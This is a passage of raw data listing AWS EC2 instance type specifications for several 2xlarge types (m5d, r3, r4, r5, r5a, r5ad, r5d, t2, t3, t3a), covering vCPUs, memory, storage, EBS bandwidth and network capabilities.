'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 62464, 'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 160, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.2xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 62464}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 160, 'Disks': [{'SizeInGB': 160, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1000, 'BaselineThroughputInMBps': 125.0, 'BaselineIops': 8000, 'MaximumBandwidthInMbps': 1000, 'MaximumThroughputInMBps': 125.0, 'MaximumIops': 8000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 62464, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 62464}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1700, 'BaselineThroughputInMBps': 212.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 1700, 'MaximumThroughputInMBps': 212.5, 'MaximumIops': 12000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1580, 'BaselineThroughputInMBps': 197.5, 'BaselineIops': 8333, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 300, 'Disks': [{'SizeInGB': 300, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 2300, 'BaselineThroughputInMBps': 287.5, 'BaselineIops': 12000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 8, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 695, 'BaselineThroughputInMBps': 86.875, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 2780, 'MaximumThroughputInMBps': 347.5, 'MaximumIops': 15700}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 5 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't3a.2xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 8, 'DefaultCores': 4, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 